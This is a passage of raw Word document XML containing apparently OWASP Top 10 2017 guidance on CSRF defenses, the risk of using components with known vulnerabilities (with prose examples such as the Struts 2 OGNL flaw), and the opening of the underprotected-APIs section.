        <w:t>AngularJS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Some web development languages, </w:t>
      </w:r>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="009E0F3B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>.NET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> do so as well. OWASP’s </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tooltip="CSRFGuard" w:history="1">
        <w:r w:rsidRPr="009E0F3B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>CSRF Guard</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> can automatically add CSRF defenses to Java apps. OWASP’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/CSRFProtector_Project" \o "CSRFProtector Project" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CSRFProtector</w:t>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the same for PHP or as an Apache filter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0F3B" w:rsidRPr="009E0F3B" w:rsidRDefault="009E0F3B" w:rsidP="009E0F3B">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Otherwise, preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0F3B" w:rsidRPr="009E0F3B" w:rsidRDefault="009E0F3B" w:rsidP="009E0F3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The preferred option is to include the unique token in a hidden field. This includes the value in the body of the HTTP request, avoiding its exposure in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0F3B" w:rsidRPr="009E0F3B" w:rsidRDefault="009E0F3B" w:rsidP="009E0F3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The unique token can also be included in the URL or a parameter. However, this runs the risk that the token will be exposed to an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0F3B" w:rsidRPr="009E0F3B" w:rsidRDefault="009E0F3B" w:rsidP="009E0F3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Consider </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="009E0F3B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>using</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=strict” flag on all cookies, which is increasingly </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:anchor="feat=same-site-cookie-attribute" w:history="1">
        <w:r w:rsidRPr="009E0F3B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>supported</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="004D49A4" w:rsidP="0039302E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:tooltip="Top 10 2017-A9-Using Components with Known Vulnerabilities" w:history="1">
        <w:r w:rsidR="0039302E" w:rsidRPr="0039302E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A9-Using Components with Known Vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Components almost always run with the full privilege of the application, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g., coding error) or intentional (e.g., backdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="004D49A4" w:rsidP="0039302E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="384"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="0039302E" w:rsidRPr="0039302E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Apache CXF Authentication Bypass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0039302E" w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="004D49A4" w:rsidP="0039302E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="384"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="0039302E" w:rsidRPr="0039302E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Struts 2 Remote Code Execution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0039302E" w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> – Sending an attack in the Content-Type header causes the content of that header to be evaluated as an OGNL expression, which enables execution of arbitrary code on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How Do I Prevent 'Using Components with Known Vulnerabilities'?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Most component projects do not create vulnerability patches for old versions. So the only way to fix the problem is to upgrade to the next version, which can require other code changes. Software projects should have a process in place to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="0039302E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>versions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/OWASP_Dependency_Check" \o "OWASP Dependency Check" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DependencyCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="0039302E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>retire.js</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Continuously monitor sources like </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="0039302E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>NVD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> for vulnerabilities in your components. Use software composition analysis tools to automate the process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Analyze libraries to be sure they are actually invoked at runtime before making changes, as the majority of components are never loaded or invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039302E" w:rsidRPr="0039302E" w:rsidRDefault="0039302E" w:rsidP="0039302E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Decide whether to upgrade component (and rewrite application to match if needed) or deploy a </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:anchor="What_is_a_Virtual_Patch.3F" w:tooltip="Virtual Patching Best Practices" w:history="1">
        <w:r w:rsidRPr="0039302E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>virtual patch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0039302E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> that analyzes HTTP traffic, data flow, or code execution and prevents vulnerabilities from being exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C470B" w:rsidRPr="007C470B" w:rsidRDefault="004D49A4" w:rsidP="007C470B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:tooltip="Top 10 2017-A10-Underprotected APIs" w:history="1">
        <w:r w:rsidR="007C470B" w:rsidRPr="007C470B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A10-Underprotected APIs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C470B" w:rsidRPr="007C470B" w:rsidRDefault="007C470B" w:rsidP="007C470B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C470B">
        <w:rPr>
